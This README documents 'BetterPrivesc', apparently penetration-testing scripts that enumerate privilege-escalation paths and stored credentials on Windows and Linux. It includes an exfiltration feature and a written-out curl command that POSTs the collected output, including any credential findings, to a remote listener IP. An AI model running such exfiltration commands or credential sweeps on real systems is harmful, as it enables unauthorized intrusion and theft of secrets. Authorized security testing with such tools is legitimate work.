BetterPrivesc

Minimal privilege escalation enumeration scripts for Windows and GNU/Linux. Straight-to-the-point output: only [+] (match), [!] (critical finding), and [-] (inconclusive), no banners, no fluff. English only.

Inspired by PEASS-ng (winPEAS / linPEAS). Implements the same kinds of checks with a compact, script-friendly format, optional keyword search, local log file, and optional exfil to a remote HTTP server.

---

Features

• Minimal output — [+] for findings, [!] for critical/exploitable findings, [-] for inconclusive; section headers with progress bar and step numbers
• Colorized — Green ([+]), red ([!]), yellow ([-]) in terminal (when supported)
• Keyword search — Recursive search from a root path for user-defined keywords (path + content); excludes system dirs
• Log to file — -l writes all result output to output.txt in addition to the console
• Exfil — -e sends the full result output to a remote HTTP server via POST with binary body to http://ip:port/output.txt

---

Requirements

Script	Environment
BetterPrivesc.ps1	Windows, PowerShell 5.1+
BetterPrivesc.sh	GNU/Linux/macOS, POSIX sh; curl for -e

---

Windows — BetterPrivesc.ps1

Usage

.\BetterPrivesc.ps1 [ options ]

Options

Parameter	Alias	Description
-FullCheck	—	Include API/keys/tokens regex (more false positives)
-Excel	—	Include Excel files in credential search
-KeywordSearch	—	Comma-separated keywords to search under C:\ (excludes \Windows). Output: [+] fullpath:keyword
-SearchRoot	—	Root for keyword search (default: C:\)
-LogFile	-l	Write all result output to output.txt (in addition to console)
-Exfiltrate	-e	Send output to http://ip:port/output.txt via POST (binary). Value: "ip:port"

Examples

# Default run
.\BetterPrivesc.ps1

# Keyword search for password, config, secret
.\BetterPrivesc.ps1 -KeywordSearch "password,config,secret"

# Log results to output.txt
.\BetterPrivesc.ps1 -l

# Exfil results to remote server (e.g. listener at 10.10.69.216:2121)
.\BetterPrivesc.ps1 -e "10.10.69.216:2121"

# Combine: keyword search + log + exfil
.\BetterPrivesc.ps1 -KeywordSearch "credential,backup" -l -e "10.10.69.216:2121"

Checks (27 sections)

1. System Information
2. Token Privileges
3. UAC & Security Policies
4. Registry Security
5. Credential Stores
6. Windows Vault & DPAPI
7. Unquoted Service Paths
8. Service Binary ACLs
9. DLL Hijacking
10. Scheduled Tasks
11. Startup & Autoruns
12. Service Registry ACLs
13. Network Information
14. Installed Applications
15. Users & Groups
16. Active Directory
17. Cloud Credentials
18. Browser Credentials
19. Interesting Files & Backups
20. Sticky Notes / Cmdkey / RDP
21. SMB Shares
22. PowerShell History
23. Processes & Named Pipes
24. AppLocker & CLM
25. Additional Privesc Vectors
26. File Password Search
27. Registry Password Search
28. Keyword Search (optional, with -KeywordSearch)

---

GNU/Linux / macOS — BetterPrivesc.sh

Usage

./BetterPrivesc.sh [ options ]

Options

Option	Description
-k "kw1,kw2"	Comma-separated keywords; recursive search from root (excludes /proc, /sys, /dev, /run). Output: [+] fullpath:keyword
-r /path	Root for keyword search (default: /)
-l	Write all result output to output.txt (in addition to console)
-e ip port	Send output to http://ip:port/output.txt via curl -X POST --data-binary @file. Two arguments: IP then port.
-h	Show help and exit

Examples

# Default run
./BetterPrivesc.sh

# Keyword search
./BetterPrivesc.sh -k "password,config,secret"

# Log to output.txt
./BetterPrivesc.sh -l

# Exfil to remote server (e.g. listener at 10.10.69.216:2121)
./BetterPrivesc.sh -e 10.10.69.216 2121

# Keyword search from /opt, log and exfil
./BetterPrivesc.sh -k "credential,backup" -r /opt -l -e 10.10.69.216 2121

Checks (25 sections)

1. System Information
2. Security Modules
3. Container / Virtualization
4. Cloud / Metadata
5. Users & Groups
6. Sudo Configuration
7. Available Software
8. Running Processes
9. Cron Jobs
10. Systemd Timers & Services
11. Network Information
12. SUID Binaries
13. SGID Binaries
14. File Capabilities
15. Interesting Files
16. SSH Keys & Configuration
17. Writable System Paths
18. World-writable Files
19. Passwords & Secrets
20. Browser & App Credentials
21. NFS Exports
22. Docker / LXD / Containerd
23. D-Bus Services
24. Backup & History Files
25. Misc Privesc Vectors
26. Keyword Search (optional, with -k)

---

Output format

• Sections — Box-drawn progress bar with step number, e.g. [01/27] System Information
• Findings — [+] in green
• Critical — [!] in red (exploitable or high-risk findings)
• Inconclusive — [-] in yellow
• Keyword hits — [+] fullpath:keyword

When stdout is not a TTY (e.g. pipe or redirect), the shell script disables ANSI codes so logs stay clean.

---

Exfil (-e)

Both scripts can send the entire result output (same text as console / output.txt) to a remote HTTP server.

• Request: POST http://<ip>:<port>/output.txt with the output as the binary body (e.g. Content-Type: application/octet-stream).
• Windows: -e "ip:port" (e.g. -e "10.10.69.216:2121").
• GNU/Linux: -e ip port (e.g. -e 10.10.69.216 2121).

Your server should accept the same style of request as:

curl -X POST --data-binary @./output.txt http://10.10.69.216:2121/output.txt

So the script effectively builds the same content, then POSTs it to http://<ip>:<port>/output.txt.

---

Credits

• PEASS-ng — winPEAS and linPEAS for the enumeration logic and ideas.

---

License

Use at your own risk. Ensure you have authorization before running on any system.